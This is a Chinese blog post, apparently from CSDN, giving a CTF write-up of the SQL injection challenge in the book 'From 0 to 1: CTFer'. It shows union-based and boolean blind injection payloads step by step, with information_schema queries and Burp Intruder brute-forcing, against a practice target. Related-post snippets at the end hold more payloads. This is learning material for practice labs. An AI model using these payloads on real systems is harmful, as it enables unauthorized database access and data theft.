《从0到1:CTFer成长之路》SQL注入漏洞

最新推荐文章于 2023-02-20 15:22:31 发布
最新推荐文章于 2023-02-20 15:22:31 发布
阅读量342 收藏
点赞数
分类专栏: 《从0到1:CTFer成长之路》 文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43072923/article/details/121701769
版权

[第一章 web入门] SQL注入漏洞

00.前言

  这篇文章将展示获取该靶机flag的过程,并且通过最典型的union注入和布尔盲注方式进行详细的分析。

启动环境

01.union注入:

  根据首页的url我们可以看到疑似注入点‘ id ’,通过修改id值来判断是否存在注入:

在这里插入图片描述

  首先通过添加单引号’判断是否存在注入,并确定其类型
在这里插入图片描述

  发现内容发生改变,说明单引号成功闭合SQL语句,且是字符型;
  猜测其语句为:
select ... from ... where id = 'x';
  我们再尝试输入id=1’and ‘1’ =’1,发现页面正常显示,即此时的SQL语句为:
select ... from ... where id ='id' and '1' ='1';
在这里插入图片描述

  再通过order by判断其字段值,为3:(其中–+是mysql的注释符)此时SQL语句为:
select ... from ... where id ='1' order by 3--+'(后面的单引号被注释了)

在这里插入图片描述
在这里插入图片描述

  使用id=' union select 1,2,3--+查看回显位置,为2,3(注意!不是 id=1’ union select 1,2,3 --+ 而是 id=X’ union select 1,2,3 --+。因为联合查询中,前面得到了结果就不会执行后面的语句了。其中X指的是任何查询失败的数据,当然直接为空最直接),则接下来在2,3位置进行注入:
在这里插入图片描述

  使用id=' union select 1,database(),user() --+查询数据库和用户名
在这里插入图片描述

  使用id=' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='note'),3--+-获取表名:
  (information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。
  也就是说information_schma可以查到你的所有的搭建的数据库名、表名和列的数据类型,在一切条件未知的情况下,存在注入点的话我们可以直接尝试对information_schema进行访问,从而获得更多的信息。
  例如SCHEMATA:提供了当前MySQL实例中所有数据库的信息
  TABLES:所有数据库表的信息
  CONLUMNS:提供了列信息)
在这里插入图片描述

  使用id=' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='fl4g'),(select group_concat(column_name) from information_schema.columns where table_name='notes')--+-得出各表的列名:
在这里插入图片描述

  最后使用id=' union select 1,group_concat(fllllag),3 from fl4g--+-获得最终数据:nf{nf_sql_1111}
在这里插入图片描述

02. 布尔盲注

  判断的步骤是一样的,倘若无回显,只有正确与错误页面,则尝试布尔盲注。
  使用?id=1' and length(database())>1--+判断数据库名字长度是否大于1,大于一则正常回显:
在这里插入图片描述

  使用?id=1' and length(database())>10--+判断数据库名字长度是否大于10,大于10则正常回显,若不正常回显则继续判断:

在这里插入图片描述

  最后我们可以确定数据库名的长度为4,?id=1' and length(database())=4--+,回显正常:
在这里插入图片描述

  接下来判断数据库中有几个表,同理慢慢就可以推出有两个表:id=1'and (select count(table_name) from information_schema.tables where table_schema=database())=2--+-
在这里插入图片描述

  得到表的个数后就判断两个表的表名长度:分别是4和5
id=1'and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=4--+- id=1'and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=5--+-
(这里limit 0,1指的是表中的第1个数据开始,只读取一个;同理limit 1,1指的是表中的第2个数据开始,只读取一个)

在这里插入图片描述

  再使用截取字符串常用的函数,mid(),substr(),left()来获取数据库名、表名、列名。
  这里用substr()演示:
          string substr(string, start, length)
  第一个参数string为要处理的字符串,start为开始位置,length为截取的长度。

Sql用例:
(1)substr(database(),1,1)>’a’,查看数据库名第一位,substr(DATABASE(),2,1)查看数据库名第二位,依次查看各位字符。
(2)substr((select table_name from information_schema.tables where table_schema=xxx limit 0,1),1,1)>’a’此处string参数可以为sql语句,可自行构造sql语句进行注入。

  我们先猜出数据库名,查看第一个字母是否为a:id=1' and substr(database(),1,1)='a'--+
在这里插入图片描述

  发现不是,便一直排序下去,可以手动一个一个试(耗时),也可以使用bp进行暴力破解,写个脚本也可以。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

  解得,数据库名为note,同样的进行对表的查询:
id=and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='a'

我们使用bp工具可节省时间:
  对网页进行发送并抓包,发送到intruder即测试器:
在这里插入图片描述

  转到测试器,在位置处选择clusterbomb:
在这里插入图片描述

  然后点击清除,并选定我们所需要改变的参数进行添加:
在这里插入图片描述

  然后转到有效载荷,其中有效负载集1,表示我们刚刚添加的第一个变量$ 1 $ ,在下面的有效载荷选项添加1,2,3,4因为我们是已知第一个表名的长度为4,同样的,有效负载集2,指的是我们添加的第二个变量$ f $ ,在下面的有效载荷选项添加az,09;我们可以从列表添加,比较方便,全部设置完成后就可以点击开始攻击了:

在这里插入图片描述

在这里插入图片描述

  攻击完成后,可以点击长度进行排序,更快地找到目标,得到表名fl4g:
在这里插入图片描述

  然后就是一样的操作流程,只是换了语句求列的个数、列名的长度与名字:
id=1'and length((select column_name from information_schema.columns where table_schema=database() and table_name='fl4g' limit 0,1))=7--+-

id=1'and substr((select column_name from information_schema.columns where table_name='fl4g' limit 0,1),1,1)='f'--+-

在这里插入图片描述

  得到列名fllllag,我们先确定此列的长度为15:
id=1'and (select length(fllllag) from fl4g)=15--+-
  最后就可以输出数据了:
id=1'and substr((select fllllag from fl4g ),1,1))='a'--+

在这里插入图片描述

03.总结

  这道题很适合小白拿来练手,可以尝试很多种的攻击方式,由于时间关系就列了两种,其他的攻击方式也差不多吧,大伙们自行尝试~

ccooll_快乐的抬锅哟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《从0到1:CTFer成长SQL注入-1
tr_trTTT的博客
04-07 4119
前言: 我是新手小白,创建此文章只为了记录自己的学习 题目: 我们先进入环境 题目已经明确告诉我们是SQL注入了,我们直接就看一下哪里会存在注入点。 网址存在id=1,可能存在注入点,手工一下看看是否存在。 先用 ' 试一下,返回了一个错误页面,说明存在sql注入,再用and 1=1 试一下,返回正确的页面,那我们再次试一下and 1=2,返回的是错误的页面; ...
《从0到1:CTFer成长》题目 SQL注入-1
qq_52718293的博客
11-27 3010
一.SQLMap ![在这里插入图片描述](https://img-blog.csdnimg.cn/2e18372d86f740ba91ce8e5ba09b1f3b.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAKuWwj-eRtg==,size_20,color_FFFFFF,t_70,g_se,x_16 4个库 2个表 一个字段 二:手注 3个字段,联合注入,回显位在2和3 查
从0到1 CTFer成功之SQL注入---学习笔记
aweiname2008的博客
06-13 465
《从0到1 CTFer成功之》学习笔记 书中已经有很详细的代码讲解,但是部分测试代码需要自己来敲,还要搭建php+mysql环境,如果这些有docker不就更好了,我自己是在虚拟机中搭建中,记录一下学习过程,希望能帮助到有需要的人。学习笔记按书的章节记录,并非全部零星记录。 第1章 web入门 1.2 CTF中的SQL注入 1.21 SQL基础 测试使用的php代码: <?php //连接本地MySQL,数据库为test $conn = mysqli_connect("127.0.0.1","
《从0到1:CTFer成长》书籍配套题目:[第一章 web入门]SQL注入
weixin_43868349的博客
03-14 299
本次做题主要是记录一下手注的过程,同时回顾一下相关内容。 题目 进入环境 首先尝试找到注入点; 用and 1=1 和 and 1=2进行尝试 之后就可以开始注入了;用order by获取字段个数; 确定回显位置; payload: ?id=-1' union select 1,2,3 %23 确定位置后就是获取数据库名; payload: ?id=-1' union select 1,database(),3 %23 接下来就是确定表名; payload: ?id=-1' union
CTF从零到一 SQL注入-2
shirazawah的博客
09-15 396
看到题目是一个系统,尝试输入值。 返回账号不存在。尝试输入admin 发现是有这个值的,然后就没有头绪了,查看源代码发现提示。 根据提示开启mysql错误提示,并使用burp发包。 因为是报错,所以自然想到书上的报错注入并尝试使用。 name=admin'+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_sche...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(...SQL注入漏洞测试(参数加密)、SQL手工注入漏洞测试(MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入...
利用SQL注入漏洞登录后台的实现方法
12-15
早在02年,国外关于SQL注入漏洞的技术文章已经很多,而国内在05年左右才开始的。 如今,谈SQL注入漏洞是否已是明日黄花,国内大大小小的网站都已经补上漏洞。但,百密必有一疏,入侵是偶然的,但安全绝对不是必然的...
SQL注入漏洞全接触.ppt
11-15
SQL注入漏洞全接触.ppt
自己动手编写SQL注入漏洞扫描工具
12-31
在CSDN上没有找到,所以将别处下载的上传过来,必须免费分享! 包括两个程序,代码尚未调试,希望有所借鉴。 代码仅供学习交流,切勿行危害安全之事,务必遵守法律法规!
php中sql注入漏洞示例 sql注入漏洞修复
12-18
b) 用户自己构造SQL语句(如:’ or 1=1#,后面会讲解) c) 将sql语句发送给数据库管理系统(DBMS) d) DBMS接收请求,并将该请求解释成机器代码指令,执行必要的存取操作 e) DBMS接受返回的结果,并处理,返回给...
《从0到1:CTFer成长》书籍配套题目-[第一章 web入门]SQL注入-2
weixin_46703850的博客
02-21 1008
《从0到1:CTFer成长》书籍配套题目,来源网站:[《从0到1:CTFer成长》](https://book.nu1l.com/)
CTFer成长之CTF中的SQL注入
平凡不平庸
02-20 1433
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
从0到1CTFer成长-第一章-CTF中的SQL注入
黑白的博客
03-01 1909
CTF中的SQL注入 声明 好好向大佬们学习!!! 攻击 https://book.nu1l.com/tasks/#/pages/web/1.2 SQL注入-1 kali执行 vim docker-compose.yml 内容如下 version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latest ports: - 80:80 开启docker .
sql盲注特点_sql盲注讲解
weixin_39838798的博客
12-24 300
盲注有时候,开发人员不会把数据库报错信息显示在前端页面,这样就使我们想要通过union注入或报错注入的攻击方式难以实现。当不显示报错信息的时候,我们还可以通过盲注的方式来对数据库进行注入攻击。盲注,顾名思义,就是在页面没有提供明显信息的情况执行的注入方式。盲注又分为两种,布尔型盲注和时间型盲注。布尔型盲注,以sqli-lab第8关为例:1、输入id=1正常显示,输入id=123456显示与正常不同...
《从0到1:CTFer成长》书籍配套题目-[第一章 web入门]SQL注入-1
weixin_46703850的博客
02-09 973
《从0到1:CTFer成长》书籍配套题目,来源网站:[《从0到1:CTFer成长》](https://book.nu1l.com/)
《从0到1:CTFer成长》书籍配套题目[第一章 web入门]SQL注入
wuyaowangchuan的博客
11-19 2007
这道题没有过滤,超级简单 文章目录手注sqlmap跑 进入环境 手注 b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1' http://b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1%27%20and%201=1%20%23 id=1%27%20and%201=2%20%23 说明是字符型注入 然后开始注入 ?id=1%27.
i春秋 从0到1CTFer成长-CTF中的SQL-1注入
wh1sper、的博客
03-25 1526
这是本萌新第一次写博客,作为对前面的学习的总结。 如有错误,欢迎各位师傅们指正。 如何判断注入类型我就不做过多的解释,不知道同学请移步去学习(手动狗头)。 CTF中的SQL注入 我采用的是手注 根据经验判断是字符型注入。 接下来就来查看有几列,order by后面依次跟1,2,3,4…当到4时页面查询失败,说明有3列。 http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=1' order by 3 %23 http://
CTF从零到一 SQL注入-1
shirazawah的博客
09-14 1813
看到id=1 首先要判断是字符型还是数字型注入 根据书上方法判断数字型 id=3-2 返回页面与id=1的页面不同,说明不是数字型 加入单引号判断是否为字符型 id=1%27(这里'被转译成%27) 没有任何返回,说明有错误,存在注入。 接下来使用order by 判断表的列数。 id=1' order by 3 --+ (空格为%20 --+注释后面的语句) 显示正常 id=1' order by 4 --+ 说明一共有三列 接着我们使用un...
《从0到1:CTFer成长》书籍配套题目第一章
Youth____的博客
12-11 1077
目录常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2 常见的搜集 题目说了敏感文件,那就扫描一下目录 我用的dirsearch扫的 有四个是可以访问的目录,一个个访问看看 先访问了.index.php.swp 下载,查看 发现一个flag 再index.php~中发现另一个flag 在robots中发现第三个flag 粗心的小李 git文件泄露 用githack下载先 在GitHack中新增的目录中打开 获得flag SQL注入-1 直接用sqlmap跑 测试是
从0到1:CTFer成长 sql注入1
最新发布
07-27
CTFer成长中,SQL注入是一个重要的技术点。SQL注入是一种利用用户输入数据不当,从而欺骗数据库执行恶意操作的攻击方式。在CTF比赛中,了解和掌握SQL注入技术可以帮助你解决一些与数据库相关的题目。 首先,你...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值